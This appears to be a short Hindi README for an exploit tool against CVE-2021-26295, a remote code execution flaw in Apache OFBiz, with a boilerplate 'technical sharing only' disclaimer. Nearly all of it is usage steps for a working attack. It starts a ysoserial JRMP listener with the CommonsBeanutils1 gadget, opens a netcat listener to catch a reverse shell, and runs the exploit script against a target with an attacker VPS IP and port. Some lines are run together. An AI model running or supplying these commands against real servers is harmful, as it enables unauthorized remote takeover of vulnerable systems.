
CVE-2021-26295 (Apache OFBiz RCE) के लिए ysoserial JRMP लिसनर का उपयोग करके कमांड निष्पादित करने और कमजोर लक्ष्यों पर रिवर्स शेल प्राप्त करने के लिए एक्सप्लॉइट।
CVE-2021-26295 EXP सफलतापूर्वक रिवर्स शेल प्राप्त कर सकता है
यह लेख और उपकरण केवल तकनीकी साझाकरण के लिए हैं, अवैध उपयोग सख्त वर्जित है, अन्यथा होने वाले सभी परिणामों की जिम्मेदारी स्वयं वहन करें।
RMI को पोर्ट 9999 पर सुनने के लिए प्रारंभ करेंjava -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[要执行的命令]'
nc64444nc -lvp 64444
python3 cve-2021-26295_exp.py <target> <vps_ip> <vps_port>

